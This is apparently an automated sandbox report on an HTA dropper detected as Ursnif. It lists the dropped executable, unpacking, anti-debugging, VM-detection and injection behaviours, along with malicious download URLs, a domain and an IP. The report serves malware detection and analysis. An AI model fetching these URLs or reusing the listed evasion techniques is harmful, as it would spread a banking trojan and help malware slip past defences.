Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeJump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4900 CREDAT:17410 /prefetch:2Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\writemeet\LaughEast\BreadWall\shinegovern\Boughtpoem\PicturePointfill.pdb source: mshta.exe, 00000003.00000003.1082299238.0000000006F71000.00000004.00000001.sdmp, ZwlegcGh.exe, 00000004.00000002.1552905765.0000000000472000.00000002.00020000.sdmp, mshta.exe, 00000005.00000003.1138297303.0000000007311000.00000004.00000001.sdmp, ZwlegcGh.exe.3.dr
Source: Binary string: c:\writemeet\LaughEast\BreadWall\shinegovern\Boughtpoem\PicturePointfill.pdb source: mshta.exe, 00000003.00000003.1082299238.0000000006F71000.00000004.00000001.sdmp, ZwlegcGh.exe, 00000004.00000002.1552905765.0000000000472000.00000002.00020000.sdmp, mshta.exe, 00000005.00000003.1138297303.0000000007311000.00000004.00000001.sdmp, ZwlegcGh.exe.3.dr

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeUnpacked PE file: 4.2.ZwlegcGh.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeUnpacked PE file: 4.2.ZwlegcGh.exe.400000.1.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00441030 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,4_2_00441030
PE file contains an invalid checksumShow sources
Source: ZwlegcGh.exe.3.drStatic PE information: real checksum: 0xc0e0f should be: 0xc0074
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\SysWOW64\mshta.exeCode function: 3_2_052CF286 pushad ; iretd 3_2_052CF2F9
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0045B01C pushad ; retf 4_2_0045B01F
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00439588 pushad ; retf 4_2_00439589
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0045B645 pushad ; retf 4_2_0045B646
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00438861 pushad ; retf 4_2_00438862
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004A7B50 push dword ptr [ebp+443C5628h]; iretd 4_2_004A7B58
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004A67A6 push eax; ret 4_2_004A67A9
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0053A95B push ecx; ret 4_2_0053A96B
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0053A5A0 push ecx; ret 4_2_0053A5A9

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00420D20 IsWindow,IsIconic,4_2_00420D20
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_4-36706
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-36147
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\SysWOW64\mshta.exe TID: 3648Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe TID: 4596Thread sleep count: 57 > 30Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 3756Thread sleep time: -30000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00535632 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_00535632
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00454670 LdrInitializeThunk,GetCurrentThread,OpenThreadToken,RevertToSelf,CloseHandle,CreateFileMappingA,GetLastError,MapViewOfFile,GetSystemInfo,_memcmp,UnmapViewOfFile,VirtualAlloc,4_2_00454670
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: mshta.exe, 00000003.00000002.1103471031.00000000065D0000.00000002.00000001.sdmp, mshta.exe, 00000005.00000002.1149456914.0000000006A60000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: mshta.exe, 00000003.00000002.1104356125.0000000006C07000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.1142469680.0000000007090000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000003.00000002.1104136824.0000000006BD4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWL
Source: mshta.exe, 00000003.00000002.1103471031.00000000065D0000.00000002.00000001.sdmp, mshta.exe, 00000005.00000002.1149456914.0000000006A60000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: mshta.exe, 00000003.00000002.1103471031.00000000065D0000.00000002.00000001.sdmp, mshta.exe, 00000005.00000002.1149456914.0000000006A60000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 00000003.00000002.1103471031.00000000065D0000.00000002.00000001.sdmp, mshta.exe, 00000005.00000002.1149456914.0000000006A60000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit pointsShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeAPI call chain: ExitProcess graph end nodegraph_4-35854
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeAPI call chain: ExitProcess graph end nodegraph_4-36679

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004016D4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,4_2_004016D4
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004507F0 IsDebuggerPresent,DebuggerProbe,4_2_004507F0
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00435AC2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_error,__invoke_watson_if_error,__invoke_watson_if_error,__snwprintf_s,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,__cftoe,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__cftoe,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,4_2_00435AC2
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00441030 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,4_2_00441030
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_001F04F7 mov eax, dword ptr fs:[00000030h]4_2_001F04F7
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_001F04F7 mov eax, dword ptr fs:[00000030h]4_2_001F04F7
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_001F00C7 push dword ptr fs:[00000030h]4_2_001F00C7
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004A6045 mov eax, dword ptr fs:[00000030h]4_2_004A6045
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004A6045 mov eax, dword ptr fs:[00000030h]4_2_004A6045
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004A5C15 push dword ptr fs:[00000030h]4_2_004A5C15
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0044FAD0 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,___doserrno,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,__get_osfhandle,SetEndOfFile,GetLastError,___doserrno,__lseeki64_nolock,4_2_0044FAD0
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00401B9B InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,4_2_00401B9B
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00439740 SetUnhandledExceptionFilter,4_2_00439740
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004405D0 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004405D0
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_0042CCE0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0042CCE0
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00436E50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00436E50

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exe C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeJump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: ZwlegcGh.exe, 00000004.00000002.1554026501.0000000000E40000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: ZwlegcGh.exe, 00000004.00000002.1554026501.0000000000E40000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: ZwlegcGh.exe, 00000004.00000002.1554026501.0000000000E40000.00000002.00000001.sdmpBinary or memory string: Progman
Source: ZwlegcGh.exe, 00000004.00000002.1554026501.0000000000E40000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: LdrInitializeThunk,GetLocaleInfoA,4_2_00450540
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00531341 cpuid 4_2_00531341
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004016D4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,4_2_004016D4
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_00531341 GetUserNameW,GetUserNameW,HeapFree,HeapFree,4_2_00531341
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Local\Temp\ZwlegcGh.exeCode function: 4_2_004018A2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,4_2_004018A2

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ZwlegcGh.exe PID: 924, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 218146 Sample: dokument11900326.hta Startdate: 26/03/2020 Architecture: WINDOWS Score: 76 42 Yara detected  Ursnif 2->42 6 mshta.exe 19 2->6         started        10 iexplore.exe 7 55 2->10         started        12 iexplore.exe 1 73 2->12         started        14 iexplore.exe 1 50 2->14         started        process3 dnsIp4 32 yubz.net 203.124.113.131, 49935, 49936, 80 unknown Singapore 6->32 28 C:\Users\user\AppData\Local\...\ZwlegcGh.exe, PE32 6->28 dropped 16 ZwlegcGh.exe 6->16         started        19 mshta.exe 18 10->19         started        22 iexplore.exe 18 10->22         started        24 iexplore.exe 31 12->24         started        26 iexplore.exe 31 14->26         started        file5 process6 dnsIp7 34 Detected unpacking (changes PE section rights) 16->34 36 Detected unpacking (overwrites its own PE header) 16->36 38 Writes or reads registry keys via WMI 16->38 40 2 other signatures 16->40 30 yubz.net 19->30 signatures8

Simulations

Behavior and APIs

TimeTypeDescription
09:46:33API Interceptor2x Sleep call for process: mshta.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
dokument11900326.hta3%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.2.ZwlegcGh.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
yubz.net3%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://abby.com1%VirustotalBrowse
https://abby.com0%Avira URL Cloudsafe
http://yubz.net/mix.exe?/0%Avira URL Cloudsafe
http://yubz.net/mix.exe70%Avira URL Cloudsafe
https://abby.com/1%VirustotalBrowse
https://abby.com/0%Avira URL Cloudsafe
http://yubz.net/mix.exe1%VirustotalBrowse
http://yubz.net/mix.exe0%Avira URL Cloudsafe
http://yubz.net/mix.exe20%Avira URL Cloudsafe
http://www.wikipedia.com/0%VirustotalBrowse
http://www.wikipedia.com/0%URL Reputationsafe
http://yubz.net/3%VirustotalBrowse
http://yubz.net/0%Avira URL Cloudsafe
https://abby.comd0%Avira URL Cloudsafe
http://yubz.net/mix.exe0:?0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.1304396728.00000000031F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.1304302273.00000000031F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.1304478289.00000000031F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.1303998727.00000000031F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.1303649085.00000000031F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000004.00000003.1304166714.00000000031F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              00000004.00000003.1304588205.00000000031F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                00000004.00000003.1304552900.00000000031F8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
                  Process Memory Space: ZwlegcGh.exe PID: 924JoeSecurity_UrsnifYara detected UrsnifJoe Security

                    Unpacked PEs

                    No yara matches

                    Sigma Overview

                    No Sigma rule has matched

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    203.124.113.131dokument9034432.htaGet hashmaliciousBrowse
                    • yubz.net/mix.exe

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    yubz.netdokument9034432.htaGet hashmaliciousBrowse
                    • 203.124.113.131

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    unknownSpLW6lfIV3Get hashmaliciousBrowse
                    • 172.217.168.14
                    http://www.tucows.com/thankyou.html?swid=1597673Get hashmaliciousBrowse
                    • 64.99.128.15
                    Scanned-file452071.pdf.lnkGet hashmaliciousBrowse
                    • 216.58.215.225
                    86soq_01[1].exeGet hashmaliciousBrowse
                    • 45.79.188.67
                    Document needed.docGet hashmaliciousBrowse
                    • 185.42.104.172
                    look_attach_s0r.jsGet hashmaliciousBrowse
                    • 5.101.51.91
                    https://www.transfernow.net/rfcDkn032020/742afcGet hashmaliciousBrowse
                    • 104.16.251.5
                    https://www.transfernow.net/rfcDkn032020/742afcGet hashmaliciousBrowse
                    • 162.216.250.35
                    #Ud83d#Udcde Portvanusa.com Voice-message_4.htmGet hashmaliciousBrowse
                    • 13.224.96.127
                    0.884289.jsGet hashmaliciousBrowse
                    • 89.107.186.3
                    Mark Shared Message.htmlGet hashmaliciousBrowse
                    • 148.72.248.46
                    dokument9034432.htaGet hashmaliciousBrowse
                    • 203.124.113.131
                    http://www.hs24st.culbco.com/aHR0cHM6Ly9ib3VjaGVmZXp0ZXIuY29tL3ZvaWNlZT9zMjRwJmVtYWlsPW1ob2hpbWVyQGZhbWlseS1pbnN0aXR1dGUub3JnJm4yNHQ=Get hashmaliciousBrowse
                    • 47.91.107.110
                    zaMTU7CMVg.exeGet hashmaliciousBrowse
                    • 104.18.88.101
                    https://polykaura.com/staple/8095423/8095423.zipGet hashmaliciousBrowse
                    • 127.0.0.1
                    job_presentation_w5i.jsGet hashmaliciousBrowse
                    • 5.101.51.91
                    pw11-pro-demo.exeGet hashmaliciousBrowse
                    • 151.101.12.134
                    https://u15378345.ct.sendgrid.net/ls/click?upn=LnRBZ0nlWE6aikWcMGzbxSndG29F1nfrc3pRL4WE6n5D96fp4WIRaLWjD2mYFsWx-2FvC3z4u6LcWfb5gedruMlC9n7T6yCeg-2BF4wruqUdOwMewU-2FnkROAGyPf-2B-2FvnpD2Zfszo_Plxpf-2FwIng3KxtCnd5dGO72CsxCEs4aYImay408PZTz7bWiDnyl3pbjPf3GfZTjBGZCyn1MtGvxgcVELOYwV9GDDDEcMAaUJGvrgvH32fWwrHFOhatvN4UQeOsjonQztmgto4c6Un1sK9DDuj8NndB1gk7yRf2BtSW-2Bvo82sqow9y4N3arjbuysXVhUySz7QdoxBdwd81xncE9Qgd-2FKFIhQoqECyewc7Gm-2B9r-2BBfM46nIYRYKydtdqjeP8jmXWtrGet hashmaliciousBrowse
                    • 167.89.118.35
                    TableOfColors.exeGet hashmaliciousBrowse
                    • 127.0.0.1
                    TableOfColors.exeGet hashmaliciousBrowse
                    • 127.0.0.1

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.